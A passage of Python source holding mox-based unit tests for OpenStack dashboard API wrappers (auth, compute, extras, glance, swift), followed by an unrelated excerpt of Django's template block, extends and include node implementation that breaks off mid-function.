        NAME = 'serviceName'

        admin_api = self.stub_admin_api()
        admin_api.services = self.mox.CreateMockAnything()
        admin_api.services.update(NAME, ENABLED).AndReturn(TEST_RETURN)

        self.mox.ReplayAll()

        ret_val = api.service_update(self.request, NAME, ENABLED)

        self.assertIsInstance(ret_val, api.Services)
        self.assertEqual(ret_val._apiresource, TEST_RETURN)

        self.mox.VerifyAll()
class AuthApiTests(test.TestCase):
    """Tests for the keystone-auth wrappers in ``api``.

    Each test records mox expectations on a stubbed ``api.auth_api``,
    replays, calls the wrapper under test, and verifies the recording.
    """
    def test_get_auth_api(self):
        """auth_api() should construct an Auth client for the keystone URL."""
        settings.OPENSTACK_KEYSTONE_URL = TEST_URL
        self.mox.StubOutClassWithMocks(OSAuth, 'Auth')
        OSAuth.Auth(management_url=settings.OPENSTACK_KEYSTONE_URL)
        self.mox.ReplayAll()
        self.assertIsNotNone(api.auth_api())
        self.mox.VerifyAll()
    def test_token_get_tenant(self):
        """token_get_tenant() returns the tenant matching the given id."""
        self.mox.StubOutWithMock(api, 'auth_api')
        auth_api_mock = self.mox.CreateMockAnything()
        api.auth_api().AndReturn(auth_api_mock)
        tenants_mock = self.mox.CreateMockAnything()
        auth_api_mock.tenants = tenants_mock
        # One decoy tenant plus the one we expect to be returned.
        tenant_list = [Tenant('notTheDroid',
                              'notTheDroid_desc',
                              False),
                       Tenant(TEST_TENANT_ID,
                              TEST_TENANT_DESCRIPTION,
                              True),
                       ]
        tenants_mock.for_token('aToken').AndReturn(tenant_list)
        self.request.session = {'token': 'aToken'}
        self.mox.ReplayAll()
        ret_val = api.token_get_tenant(self.request, TEST_TENANT_ID)
        self.assertEqual(tenant_list[1], ret_val)
        self.mox.VerifyAll()
    def test_token_get_tenant_no_tenant(self):
        """token_get_tenant() returns None when no tenant id matches."""
        self.mox.StubOutWithMock(api, 'auth_api')
        auth_api_mock = self.mox.CreateMockAnything()
        api.auth_api().AndReturn(auth_api_mock)
        tenants_mock = self.mox.CreateMockAnything()
        auth_api_mock.tenants = tenants_mock
        tenant_list = [Tenant('notTheDroid',
                              'notTheDroid_desc',
                              False),
                       ]
        tenants_mock.for_token('aToken').AndReturn(tenant_list)
        self.request.session = {'token': 'aToken'}
        self.mox.ReplayAll()
        ret_val = api.token_get_tenant(self.request, TEST_TENANT_ID)
        self.assertIsNone(ret_val)
        self.mox.VerifyAll()
    def test_token_list_tenants(self):
        """token_list_tenants() returns every tenant for the given token."""
        self.mox.StubOutWithMock(api, 'auth_api')
        auth_api_mock = self.mox.CreateMockAnything()
        api.auth_api().AndReturn(auth_api_mock)
        tenants_mock = self.mox.CreateMockAnything()
        auth_api_mock.tenants = tenants_mock
        tenant_list = [Tenant('notTheDroid',
                              'notTheDroid_desc',
                              False),
                       Tenant(TEST_TENANT_ID,
                              TEST_TENANT_DESCRIPTION,
                              True),
                       ]
        tenants_mock.for_token('aToken').AndReturn(tenant_list)
        self.mox.ReplayAll()
        ret_val = api.token_list_tenants(self.request, 'aToken')
        for tenant in ret_val:
            self.assertIn(tenant, tenant_list)
        self.mox.VerifyAll()
    def test_token_create(self):
        """token_create() proxies to tokens.create and returns the token."""
        self.mox.StubOutWithMock(api, 'auth_api')
        auth_api_mock = self.mox.CreateMockAnything()
        api.auth_api().AndReturn(auth_api_mock)
        tokens_mock = self.mox.CreateMockAnything()
        auth_api_mock.tokens = tokens_mock
        test_token = Token(TEST_TOKEN_ID, TEST_USERNAME, TEST_TENANT_ID)
        tokens_mock.create(TEST_TENANT_ID, TEST_USERNAME,
                           TEST_PASSWORD).AndReturn(test_token)
        self.mox.ReplayAll()
        ret_val = api.token_create(self.request, TEST_TENANT_ID,
                                   TEST_USERNAME, TEST_PASSWORD)
        self.assertEqual(test_token, ret_val)
        self.mox.VerifyAll()
class ComputeApiTests(test.TestCase):
    """Tests for the nova compute wrappers in ``api``."""
    def stub_compute_api(self, count=1):
        """Replace api.compute_api with a mock expected *count* times."""
        self.mox.StubOutWithMock(api, 'compute_api')
        compute_api = self.mox.CreateMock(OSCompute.Compute)
        for i in range(count):
            api.compute_api(IsA(http.HttpRequest)).AndReturn(compute_api)
        return compute_api
    def test_get_compute_api(self):
        """compute_api() builds a Compute client pointed at the nova URL."""
        # Minimal stand-in for the client attribute set by compute_api().
        class ComputeClient(object):
            __slots__ = ['auth_token', 'management_url']
        self.mox.StubOutClassWithMocks(OSCompute, 'Compute')
        compute_api = OSCompute.Compute(auth_token=TEST_TOKEN,
                                        management_url=TEST_URL)
        compute_api.client = ComputeClient()
        self.mox.StubOutWithMock(api, 'url_for')
        # called three times? Looks like a good place for optimization
        api.url_for(IsA(http.HttpRequest), 'nova').AndReturn(TEST_URL)
        api.url_for(IsA(http.HttpRequest), 'nova').AndReturn(TEST_URL)
        api.url_for(IsA(http.HttpRequest), 'nova').AndReturn(TEST_URL)
        self.mox.ReplayAll()
        compute_api = api.compute_api(self.request)
        self.assertIsNotNone(compute_api)
        self.assertEqual(compute_api.client.auth_token, TEST_TOKEN)
        self.assertEqual(compute_api.client.management_url, TEST_URL)
        self.mox.VerifyAll()
    def test_flavor_get(self):
        """flavor_get() wraps flavors.get in api.Flavor."""
        FLAVOR_ID = 6
        compute_api = self.stub_compute_api()
        compute_api.flavors = self.mox.CreateMockAnything()
        compute_api.flavors.get(FLAVOR_ID).AndReturn(TEST_RETURN)
        self.mox.ReplayAll()
        ret_val = api.flavor_get(self.request, FLAVOR_ID)
        self.assertIsInstance(ret_val, api.Flavor)
        self.assertEqual(ret_val._apiresource, TEST_RETURN)
        self.mox.VerifyAll()
    def test_server_delete(self):
        """server_delete() proxies to servers.delete and returns None."""
        INSTANCE = 'anInstance'
        compute_api = self.stub_compute_api()
        compute_api.servers = self.mox.CreateMockAnything()
        compute_api.servers.delete(INSTANCE).AndReturn(TEST_RETURN)
        self.mox.ReplayAll()
        ret_val = api.server_delete(self.request, INSTANCE)
        self.assertIsNone(ret_val)
        self.mox.VerifyAll()
    def test_server_get(self):
        """server_get() wraps servers.get in api.Server."""
        INSTANCE_ID = '2'
        compute_api = self.stub_compute_api()
        compute_api.servers = self.mox.CreateMockAnything()
        compute_api.servers.get(INSTANCE_ID).AndReturn(TEST_RETURN)
        self.mox.ReplayAll()
        ret_val = api.server_get(self.request, INSTANCE_ID)
        self.assertIsInstance(ret_val, api.Server)
        self.assertEqual(ret_val._apiresource, TEST_RETURN)
        self.mox.VerifyAll()
    def test_server_reboot(self):
        """server_reboot() defaults to REBOOT_HARD and forwards hardness."""
        INSTANCE_ID = '2'
        HARDNESS = 'diamond'
        self.mox.StubOutWithMock(api, 'server_get')
        # First call: default hardness (REBOOT_HARD).
        server = self.mox.CreateMock(OSCompute.Server)
        server.reboot(OSCompute.servers.REBOOT_HARD).AndReturn(TEST_RETURN)
        api.server_get(IsA(http.HttpRequest), INSTANCE_ID).AndReturn(server)
        # Second call: explicit hardness passed through unchanged.
        server = self.mox.CreateMock(OSCompute.Server)
        server.reboot(HARDNESS).AndReturn(TEST_RETURN)
        api.server_get(IsA(http.HttpRequest), INSTANCE_ID).AndReturn(server)
        self.mox.ReplayAll()
        ret_val = api.server_reboot(self.request, INSTANCE_ID)
        self.assertIsNone(ret_val)
        ret_val = api.server_reboot(self.request, INSTANCE_ID,
                                    hardness=HARDNESS)
        self.assertIsNone(ret_val)
        self.mox.VerifyAll()
class ExtrasApiTests(test.TestCase):
    """Tests for the openstackx 'extras' wrappers in ``api``."""
    def stub_extras_api(self, count=1):
        """Replace api.extras_api with a mock expected *count* times."""
        self.mox.StubOutWithMock(api, 'extras_api')
        extras_api = self.mox.CreateMock(OSExtras.Extras)
        for i in range(count):
            api.extras_api(IsA(http.HttpRequest)).AndReturn(extras_api)
        return extras_api
    def test_get_extras_api(self):
        """extras_api() builds an Extras client pointed at the nova URL."""
        self.mox.StubOutClassWithMocks(OSExtras, 'Extras')
        OSExtras.Extras(auth_token=TEST_TOKEN, management_url=TEST_URL)
        self.mox.StubOutWithMock(api, 'url_for')
        # url_for is consulted twice per client construction.
        api.url_for(IsA(http.HttpRequest), 'nova').AndReturn(TEST_URL)
        api.url_for(IsA(http.HttpRequest), 'nova').AndReturn(TEST_URL)
        self.mox.ReplayAll()
        self.assertIsNotNone(api.extras_api(self.request))
        self.mox.VerifyAll()
    def test_console_create(self):
        """console_create() forwards the kind, defaulting it to 'text'."""
        extras_api = self.stub_extras_api(count=2)
        extras_api.consoles = self.mox.CreateMockAnything()
        extras_api.consoles.create(
            TEST_INSTANCE_ID, TEST_CONSOLE_KIND).AndReturn(TEST_RETURN)
        extras_api.consoles.create(
            TEST_INSTANCE_ID, 'text').AndReturn(TEST_RETURN + '2')
        self.mox.ReplayAll()
        ret_val = api.console_create(self.request,
                                     TEST_INSTANCE_ID,
                                     TEST_CONSOLE_KIND)
        self.assertIsInstance(ret_val, api.Console)
        self.assertEqual(ret_val._apiresource, TEST_RETURN)
        ret_val = api.console_create(self.request, TEST_INSTANCE_ID)
        self.assertIsInstance(ret_val, api.Console)
        self.assertEqual(ret_val._apiresource, TEST_RETURN + '2')
        self.mox.VerifyAll()
    def test_flavor_list(self):
        """flavor_list() wraps each listed item in api.Flavor."""
        flavors = (TEST_RETURN, TEST_RETURN + '2')
        extras_api = self.stub_extras_api()
        extras_api.flavors = self.mox.CreateMockAnything()
        extras_api.flavors.list().AndReturn(flavors)
        self.mox.ReplayAll()
        ret_val = api.flavor_list(self.request)
        self.assertEqual(len(ret_val), len(flavors))
        for flavor in ret_val:
            self.assertIsInstance(flavor, api.Flavor)
            self.assertIn(flavor._apiresource, flavors)
        self.mox.VerifyAll()
    def test_keypair_create(self):
        """keypair_create() wraps keypairs.create in api.KeyPair."""
        NAME = '1'
        extras_api = self.stub_extras_api()
        extras_api.keypairs = self.mox.CreateMockAnything()
        extras_api.keypairs.create(NAME).AndReturn(TEST_RETURN)
        self.mox.ReplayAll()
        ret_val = api.keypair_create(self.request, NAME)
        self.assertIsInstance(ret_val, api.KeyPair)
        self.assertEqual(ret_val._apiresource, TEST_RETURN)
        self.mox.VerifyAll()
    def test_keypair_delete(self):
        """keypair_delete() proxies to keypairs.delete, returning None."""
        KEYPAIR_ID = '1'
        extras_api = self.stub_extras_api()
        extras_api.keypairs = self.mox.CreateMockAnything()
        extras_api.keypairs.delete(KEYPAIR_ID).AndReturn(TEST_RETURN)
        self.mox.ReplayAll()
        ret_val = api.keypair_delete(self.request, KEYPAIR_ID)
        self.assertIsNone(ret_val)
        self.mox.VerifyAll()
    def test_keypair_list(self):
        """keypair_list() wraps each listed item in api.KeyPair."""
        NAME = 'keypair'
        keypairs = (NAME + '1', NAME + '2')
        extras_api = self.stub_extras_api()
        extras_api.keypairs = self.mox.CreateMockAnything()
        extras_api.keypairs.list().AndReturn(keypairs)
        self.mox.ReplayAll()
        ret_val = api.keypair_list(self.request)
        self.assertEqual(len(ret_val), len(keypairs))
        for keypair in ret_val:
            self.assertIsInstance(keypair, api.KeyPair)
            self.assertIn(keypair._apiresource, keypairs)
        self.mox.VerifyAll()
    def test_server_create(self):
        """server_create() forwards user_data/key_name as keyword args."""
        NAME = 'server'
        IMAGE = 'anImage'
        FLAVOR = 'cherry'
        USER_DATA = {'nuts': 'berries'}
        KEY = 'user'
        extras_api = self.stub_extras_api()
        extras_api.servers = self.mox.CreateMockAnything()
        extras_api.servers.create(NAME, IMAGE, FLAVOR, user_data=USER_DATA,
                                  key_name=KEY).AndReturn(TEST_RETURN)
        self.mox.ReplayAll()
        ret_val = api.server_create(self.request, NAME, IMAGE, FLAVOR,
                                    KEY, USER_DATA)
        self.assertIsInstance(ret_val, api.Server)
        self.assertEqual(ret_val._apiresource, TEST_RETURN)
        self.mox.VerifyAll()
    def test_server_list(self):
        """server_list() wraps each listed item in api.Server."""
        servers = (TEST_RETURN, TEST_RETURN + '2')
        extras_api = self.stub_extras_api()
        extras_api.servers = self.mox.CreateMockAnything()
        extras_api.servers.list().AndReturn(servers)
        self.mox.ReplayAll()
        ret_val = api.server_list(self.request)
        self.assertEqual(len(ret_val), len(servers))
        for server in ret_val:
            self.assertIsInstance(server, api.Server)
            self.assertIn(server._apiresource, servers)
        self.mox.VerifyAll()
    def test_usage_get(self):
        """usage_get() wraps the usage for a tenant/date range."""
        extras_api = self.stub_extras_api()
        extras_api.usage = self.mox.CreateMockAnything()
        extras_api.usage.get(TEST_TENANT_ID, 'start',
                             'end').AndReturn(TEST_RETURN)
        self.mox.ReplayAll()
        ret_val = api.usage_get(self.request, TEST_TENANT_ID, 'start', 'end')
        self.assertIsInstance(ret_val, api.Usage)
        self.assertEqual(ret_val._apiresource, TEST_RETURN)
        self.mox.VerifyAll()
    def test_usage_list(self):
        """usage_list() wraps each listed item in api.Usage."""
        usages = (TEST_RETURN, TEST_RETURN + '2')
        extras_api = self.stub_extras_api()
        extras_api.usage = self.mox.CreateMockAnything()
        extras_api.usage.list('start', 'end').AndReturn(usages)
        self.mox.ReplayAll()
        ret_val = api.usage_list(self.request, 'start', 'end')
        self.assertEqual(len(ret_val), len(usages))
        for usage in ret_val:
            self.assertIsInstance(usage, api.Usage)
            self.assertIn(usage._apiresource, usages)
        self.mox.VerifyAll()
class GlanceApiTests(test.TestCase):
    """Tests for the Glance image wrappers in ``api``.

    Each test stubs ``api.glance_api`` with a recorded mox mock, replays,
    calls the wrapper under test, then verifies the recording.
    """
    def stub_glance_api(self, count=1):
        """Replace api.glance_api with a mock expected *count* times."""
        self.mox.StubOutWithMock(api, 'glance_api')
        glance_api = self.mox.CreateMock(glance_client.Client)
        for i in range(count):
            api.glance_api(IsA(http.HttpRequest)).AndReturn(glance_api)
        return glance_api
    def test_get_glance_api(self):
        """glance_api() builds a Client for the 'glance' service endpoint."""
        self.mox.StubOutClassWithMocks(glance_client, 'Client')
        glance_client.Client(TEST_HOSTNAME, TEST_PORT)
        self.mox.StubOutWithMock(api, 'url_for')
        api.url_for(IsA(http.HttpRequest), 'glance').AndReturn(TEST_URL)
        self.mox.ReplayAll()
        self.assertIsNotNone(api.glance_api(self.request))
        self.mox.VerifyAll()
    def test_image_create(self):
        """image_create() proxies to add_image and wraps in api.Image."""
        IMAGE_FILE = 'someData'
        IMAGE_META = {'metadata': 'foo'}
        glance_api = self.stub_glance_api()
        glance_api.add_image(IMAGE_META, IMAGE_FILE).AndReturn(TEST_RETURN)
        self.mox.ReplayAll()
        ret_val = api.image_create(self.request, IMAGE_META, IMAGE_FILE)
        self.assertIsInstance(ret_val, api.Image)
        self.assertEqual(ret_val._apidict, TEST_RETURN)
        self.mox.VerifyAll()
    def test_image_delete(self):
        """image_delete() returns delete_image's result unwrapped."""
        IMAGE_ID = '1'
        glance_api = self.stub_glance_api()
        glance_api.delete_image(IMAGE_ID).AndReturn(TEST_RETURN)
        self.mox.ReplayAll()
        ret_val = api.image_delete(self.request, IMAGE_ID)
        self.assertEqual(ret_val, TEST_RETURN)
        self.mox.VerifyAll()
    def test_image_get(self):
        """image_get() unwraps the single-element list from get_image."""
        IMAGE_ID = '1'
        glance_api = self.stub_glance_api()
        glance_api.get_image(IMAGE_ID).AndReturn([TEST_RETURN])
        self.mox.ReplayAll()
        ret_val = api.image_get(self.request, IMAGE_ID)
        self.assertIsInstance(ret_val, api.Image)
        self.assertEqual(ret_val._apidict, TEST_RETURN)
        # Fix: this test previously never verified its recorded mox
        # expectations; add VerifyAll() for consistency with its siblings.
        self.mox.VerifyAll()
    def test_image_list_detailed(self):
        """image_list_detailed() wraps each returned item in api.Image."""
        images = (TEST_RETURN, TEST_RETURN + '2')
        glance_api = self.stub_glance_api()
        glance_api.get_images_detailed().AndReturn(images)
        self.mox.ReplayAll()
        ret_val = api.image_list_detailed(self.request)
        self.assertEqual(len(ret_val), len(images))
        for image in ret_val:
            self.assertIsInstance(image, api.Image)
            self.assertIn(image._apidict, images)
        self.mox.VerifyAll()
    def test_image_update(self):
        """image_update() defaults image_meta to {} and wraps the result."""
        IMAGE_ID = '1'
        IMAGE_META = {'metadata': 'foobar'}
        glance_api = self.stub_glance_api(count=2)
        glance_api.update_image(IMAGE_ID, image_meta={}).AndReturn(TEST_RETURN)
        glance_api.update_image(IMAGE_ID,
                                image_meta=IMAGE_META).AndReturn(TEST_RETURN)
        self.mox.ReplayAll()
        ret_val = api.image_update(self.request, IMAGE_ID)
        self.assertIsInstance(ret_val, api.Image)
        self.assertEqual(ret_val._apidict, TEST_RETURN)
        ret_val = api.image_update(self.request,
                                   IMAGE_ID,
                                   image_meta=IMAGE_META)
        self.assertIsInstance(ret_val, api.Image)
        self.assertEqual(ret_val._apidict, TEST_RETURN)
        self.mox.VerifyAll()
class SwiftApiTests(test.TestCase):
    """Tests for the Swift (cloudfiles) object-store wrappers in ``api``."""
    def setUp(self):
        # NOTE(review): builds its own mox and request rather than calling
        # super(SwiftApiTests, self).setUp() — confirm this is intentional.
        self.mox = mox.Mox()
        self.request = http.HttpRequest()
        self.request.session = dict()
        self.request.session['token'] = TEST_TOKEN
    def tearDown(self):
        self.mox.UnsetStubs()
    def stub_swift_api(self, count=1):
        """Replace api.swift_api with a mock expected *count* times."""
        self.mox.StubOutWithMock(api, 'swift_api')
        swift_api = self.mox.CreateMock(cloudfiles.connection.Connection)
        for i in range(count):
            api.swift_api(IsA(http.HttpRequest)).AndReturn(swift_api)
        return swift_api
    def test_swift_get_containers(self):
        """swift_get_containers() wraps each container in api.Container."""
        containers = (TEST_RETURN, TEST_RETURN + '2')
        swift_api = self.stub_swift_api()
        swift_api.get_all_containers().AndReturn(containers)
        self.mox.ReplayAll()
        ret_val = api.swift_get_containers(self.request)
        self.assertEqual(len(ret_val), len(containers))
        for container in ret_val:
            self.assertIsInstance(container, api.Container)
            self.assertIn(container._apiresource, containers)
        self.mox.VerifyAll()
    def test_swift_create_container(self):
        """swift_create_container() checks for existence before creating."""
        NAME = 'containerName'
        swift_api = self.stub_swift_api()
        self.mox.StubOutWithMock(api, 'swift_container_exists')
        api.swift_container_exists(self.request,
                                   NAME).AndReturn(False)
        swift_api.create_container(NAME).AndReturn(TEST_RETURN)
        self.mox.ReplayAll()
        ret_val = api.swift_create_container(self.request, NAME)
        self.assertIsInstance(ret_val, api.Container)
        self.assertEqual(ret_val._apiresource, TEST_RETURN)
        self.mox.VerifyAll()
    def test_swift_delete_container(self):
        """swift_delete_container() proxies to delete and returns None."""
        NAME = 'containerName'
        swift_api = self.stub_swift_api()
        swift_api.delete_container(NAME).AndReturn(TEST_RETURN)
        self.mox.ReplayAll()
        ret_val = api.swift_delete_container(self.request, NAME)
        self.assertIsNone(ret_val)
        self.mox.VerifyAll()
    def test_swift_get_objects(self):
        """swift_get_objects() lists with no prefix by default."""
        NAME = 'containerName'
        swift_objects = (TEST_RETURN, TEST_RETURN + '2')
        container = self.mox.CreateMock(cloudfiles.container.Container)
        container.get_objects(prefix=None).AndReturn(swift_objects)
        swift_api = self.stub_swift_api()
        swift_api.get_container(NAME).AndReturn(container)
        self.mox.ReplayAll()
        ret_val = api.swift_get_objects(self.request, NAME)
        self.assertEqual(len(ret_val), len(swift_objects))
        for swift_object in ret_val:
            self.assertIsInstance(swift_object, api.SwiftObject)
            self.assertIn(swift_object._apiresource, swift_objects)
        self.mox.VerifyAll()
    def test_swift_get_objects_with_prefix(self):
        """swift_get_objects() forwards an explicit prefix."""
        NAME = 'containerName'
        PREFIX = 'prefacedWith'
        swift_objects = (TEST_RETURN, TEST_RETURN + '2')
        container = self.mox.CreateMock(cloudfiles.container.Container)
        container.get_objects(prefix=PREFIX).AndReturn(swift_objects)
        swift_api = self.stub_swift_api()
        swift_api.get_container(NAME).AndReturn(container)
        self.mox.ReplayAll()
        ret_val = api.swift_get_objects(self.request,
                                        NAME,
                                        prefix=PREFIX)
        self.assertEqual(len(ret_val), len(swift_objects))
        for swift_object in ret_val:
            self.assertIsInstance(swift_object, api.SwiftObject)
            self.assertIn(swift_object._apiresource, swift_objects)
        self.mox.VerifyAll()
    def test_swift_upload_object(self):
        """swift_upload_object() creates the object then writes the data."""
        CONTAINER_NAME = 'containerName'
        OBJECT_NAME = 'objectName'
        OBJECT_DATA = 'someData'
        swift_api = self.stub_swift_api()
        container = self.mox.CreateMock(cloudfiles.container.Container)
        swift_object = self.mox.CreateMock(cloudfiles.storage_object.Object)
        swift_api.get_container(CONTAINER_NAME).AndReturn(container)
        container.create_object(OBJECT_NAME).AndReturn(swift_object)
        swift_object.write(OBJECT_DATA).AndReturn(TEST_RETURN)
        self.mox.ReplayAll()
        ret_val = api.swift_upload_object(self.request,
                                          CONTAINER_NAME,
                                          OBJECT_NAME,
                                          OBJECT_DATA)
        self.assertIsNone(ret_val)
        self.mox.VerifyAll()
    def test_swift_delete_object(self):
        """swift_delete_object() deletes via the container, returns None."""
        CONTAINER_NAME = 'containerName'
        OBJECT_NAME = 'objectName'
        swift_api = self.stub_swift_api()
        container = self.mox.CreateMock(cloudfiles.container.Container)
        swift_api.get_container(CONTAINER_NAME).AndReturn(container)
        container.delete_object(OBJECT_NAME).AndReturn(TEST_RETURN)
        self.mox.ReplayAll()
        ret_val = api.swift_delete_object(self.request,
                                          CONTAINER_NAME,
                                          OBJECT_NAME)
        self.assertIsNone(ret_val)
        self.mox.VerifyAll()
    def test_swift_get_object_data(self):
        """swift_get_object_data() returns the object's stream."""
        CONTAINER_NAME = 'containerName'
        OBJECT_NAME = 'objectName'
        OBJECT_DATA = 'objectData'
        swift_api = self.stub_swift_api()
        container = self.mox.CreateMock(cloudfiles.container.Container)
        swift_object = self.mox.CreateMock(cloudfiles.storage_object.Object)
        swift_api.get_container(CONTAINER_NAME).AndReturn(container)
        container.get_object(OBJECT_NAME).AndReturn(swift_object)
        swift_object.stream().AndReturn(OBJECT_DATA)
        self.mox.ReplayAll()
        ret_val = api.swift_get_object_data(self.request,
                                            CONTAINER_NAME,
                                            OBJECT_NAME)
        self.assertEqual(ret_val, OBJECT_DATA)
        self.mox.VerifyAll()
    def test_swift_object_exists(self):
        """swift_object_exists() is True when get_object succeeds."""
        CONTAINER_NAME = 'containerName'
        OBJECT_NAME = 'objectName'
        swift_api = self.stub_swift_api()
        container = self.mox.CreateMock(cloudfiles.container.Container)
        # NOTE(review): sibling tests mock cloudfiles.storage_object.Object;
        # confirm cloudfiles.Object is the same class re-exported.
        swift_object = self.mox.CreateMock(cloudfiles.Object)
        swift_api.get_container(CONTAINER_NAME).AndReturn(container)
        container.get_object(OBJECT_NAME).AndReturn(swift_object)
        self.mox.ReplayAll()
        ret_val = api.swift_object_exists(self.request,
                                          CONTAINER_NAME,
                                          OBJECT_NAME)
        self.assertTrue(ret_val)
        self.mox.VerifyAll()
    def test_swift_copy_object(self):
        """swift_copy_object() copies when the target does not exist."""
        CONTAINER_NAME = 'containerName'
        OBJECT_NAME = 'objectName'
        swift_api = self.stub_swift_api()
        container = self.mox.CreateMock(cloudfiles.container.Container)
        self.mox.StubOutWithMock(api, 'swift_object_exists')
        swift_object = self.mox.CreateMock(cloudfiles.Object)
        swift_api.get_container(CONTAINER_NAME).AndReturn(container)
        api.swift_object_exists(self.request,
                                CONTAINER_NAME,
                                OBJECT_NAME).AndReturn(False)
        container.get_object(OBJECT_NAME).AndReturn(swift_object)
        swift_object.copy_to(CONTAINER_NAME, OBJECT_NAME)
        self.mox.ReplayAll()
        ret_val = api.swift_copy_object(self.request, CONTAINER_NAME,
                                        OBJECT_NAME, CONTAINER_NAME,
                                        OBJECT_NAME)
        self.assertIsNone(ret_val)
        self.mox.VerifyAll()
|
|
from collections import defaultdict
from django.utils import six
from django.utils.safestring import mark_safe
from .base import (
Node, Template, TemplateSyntaxError, TextNode, Variable, token_kwargs,
)
from .library import Library
register = Library()
BLOCK_CONTEXT_KEY = 'block_context'
class ExtendsError(Exception):
    """Raised when ``{% extends %}`` cannot proceed, e.g. when a template
    would extend itself recursively under non-recursive loaders."""
    pass
class BlockContext(object):
    """Bookkeeping for block overrides while rendering an extends chain.

    Each block name maps to a stack of candidate BlockNodes; the top of
    the stack is the most-derived (winning) definition.
    """

    def __init__(self):
        # Dictionary of FIFO queues, one per block name.
        self.blocks = defaultdict(list)

    def add_blocks(self, blocks):
        """Insert *blocks* at the front so earlier (child) templates win."""
        for name, block in six.iteritems(blocks):
            self.blocks[name].insert(0, block)

    def pop(self, name):
        """Remove and return the top block for *name*, or None if empty."""
        queue = self.blocks[name]
        if queue:
            return queue.pop()
        return None

    def push(self, name, block):
        """Put *block* back on top of the stack for *name*."""
        self.blocks[name].append(block)

    def get_block(self, name):
        """Return the top block for *name* without removing it, or None."""
        queue = self.blocks[name]
        if queue:
            return queue[-1]
        return None
class BlockNode(Node):
    """Node for ``{% block %}``: renders either its own contents or an
    override recorded in the render context's BlockContext."""
    def __init__(self, name, nodelist, parent=None):
        self.name, self.nodelist, self.parent = name, nodelist, parent
    def __repr__(self):
        return "<Block Node: %s. Contents: %r>" % (self.name, self.nodelist)
    def render(self, context):
        block_context = context.render_context.get(BLOCK_CONTEXT_KEY)
        with context.push():
            if block_context is None:
                # Not under {% extends %}: render this block's own contents.
                context['block'] = self
                result = self.nodelist.render(context)
            else:
                # Pop the winning override (may be None if no override).
                push = block = block_context.pop(self.name)
                if block is None:
                    block = self
                # Create new block so we can store context without thread-safety issues.
                block = type(self)(block.name, block.nodelist)
                block.context = context
                context['block'] = block
                result = block.nodelist.render(context)
                # Restore the popped block so later renders still see it.
                if push is not None:
                    block_context.push(self.name, push)
        return result
    def super(self):
        """Render the parent template's version of this block
        ({{ block.super }}); returns '' when there is no parent block."""
        if not hasattr(self, 'context'):
            raise TemplateSyntaxError(
                "'%s' object has no attribute 'context'. Did you use "
                "{{ block.super }} in a base template?" % self.__class__.__name__
            )
        render_context = self.context.render_context
        if (BLOCK_CONTEXT_KEY in render_context and
                render_context[BLOCK_CONTEXT_KEY].get_block(self.name) is not None):
            return mark_safe(self.render(self.context))
        return ''
class ExtendsNode(Node):
    """Node for ``{% extends %}``: resolves the parent template and renders
    it with this template's blocks layered into the shared BlockContext."""
    # The template parser requires extends to be the first tag in a template.
    must_be_first = True
    # render_context key holding the history of templates already extended.
    context_key = 'extends_context'
    def __init__(self, nodelist, parent_name, template_dirs=None):
        self.nodelist = nodelist
        self.parent_name = parent_name
        self.template_dirs = template_dirs
        # Map of block name -> BlockNode for every block in this template.
        self.blocks = {n.name: n for n in nodelist.get_nodes_by_type(BlockNode)}
    def __repr__(self):
        return '<ExtendsNode: extends %s>' % self.parent_name.token
    def find_template(self, template_name, context):
        """
        This is a wrapper around engine.find_template(). A history is kept in
        the render_context attribute between successive extends calls and
        passed as the skip argument. This enables extends to work recursively
        without extending the same template twice.
        """
        # RemovedInDjango21Warning: If any non-recursive loaders are installed
        # do a direct template lookup. If the same template name appears twice,
        # raise an exception to avoid system recursion.
        for loader in context.template.engine.template_loaders:
            if not loader.supports_recursion:
                history = context.render_context.setdefault(
                    self.context_key, [context.template.origin.template_name],
                )
                if template_name in history:
                    raise ExtendsError(
                        "Cannot extend templates recursively when using "
                        "non-recursive template loaders",
                    )
                template = context.template.engine.get_template(template_name)
                history.append(template_name)
                return template
        # Recursive path: skip origins already visited in this extends chain.
        history = context.render_context.setdefault(
            self.context_key, [context.template.origin],
        )
        template, origin = context.template.engine.find_template(
            template_name, skip=history,
        )
        history.append(origin)
        return template
    def get_parent(self, context):
        """Resolve parent_name and return it as a django.template.Template."""
        parent = self.parent_name.resolve(context)
        if not parent:
            error_msg = "Invalid template name in 'extends' tag: %r." % parent
            if self.parent_name.filters or\
                    isinstance(self.parent_name.var, Variable):
                error_msg += " Got this from the '%s' variable." %\
                    self.parent_name.token
            raise TemplateSyntaxError(error_msg)
        if isinstance(parent, Template):
            # parent is a django.template.Template
            return parent
        if isinstance(getattr(parent, 'template', None), Template):
            # parent is a django.template.backends.django.Template
            return parent.template
        return self.find_template(parent, context)
    def render(self, context):
        compiled_parent = self.get_parent(context)
        if BLOCK_CONTEXT_KEY not in context.render_context:
            context.render_context[BLOCK_CONTEXT_KEY] = BlockContext()
        block_context = context.render_context[BLOCK_CONTEXT_KEY]
        # Add the block nodes from this node to the block context
        block_context.add_blocks(self.blocks)
        # If this block's parent doesn't have an extends node it is the root,
        # and its block nodes also need to be added to the block context.
        for node in compiled_parent.nodelist:
            # The ExtendsNode has to be the first non-text node.
            if not isinstance(node, TextNode):
                if not isinstance(node, ExtendsNode):
                    blocks = {n.name: n for n in
                              compiled_parent.nodelist.get_nodes_by_type(BlockNode)}
                    block_context.add_blocks(blocks)
                break
        # Call Template._render explicitly so the parser context stays
        # the same.
        return compiled_parent._render(context)
class IncludeNode(Node):
    """Node for ``{% include %}``: renders another template inline,
    optionally with extra context or an isolated context."""
    # render_context key for the per-render template cache (see render()).
    context_key = '__include_context'
    def __init__(self, template, *args, **kwargs):
        self.template = template
        # Mapping of name -> FilterExpression resolved at render time.
        self.extra_context = kwargs.pop('extra_context', {})
        # When True ('only'), the included template sees only extra_context.
        self.isolated_context = kwargs.pop('isolated_context', False)
        super(IncludeNode, self).__init__(*args, **kwargs)
    def render(self, context):
        """
        Render the specified template and context. Cache the template object
        in render_context to avoid reparsing and loading when used in a for
        loop.
        """
        try:
            template = self.template.resolve(context)
            # Does this quack like a Template?
            if not callable(getattr(template, 'render', None)):
                # If not, we'll try our cache, and get_template()
                template_name = template
                cache = context.render_context.setdefault(self.context_key, {})
                template = cache.get(template_name)
                if template is None:
                    template = context.template.engine.get_template(template_name)
                    cache[template_name] = template
            values = {
                name: var.resolve(context)
                for name, var in six.iteritems(self.extra_context)
            }
            if self.isolated_context:
                return template.render(context.new(values))
            with context.push(**values):
                return template.render(context)
        except Exception:
            # Deliberate best-effort: include failures render as empty
            # output unless the engine is in debug mode.
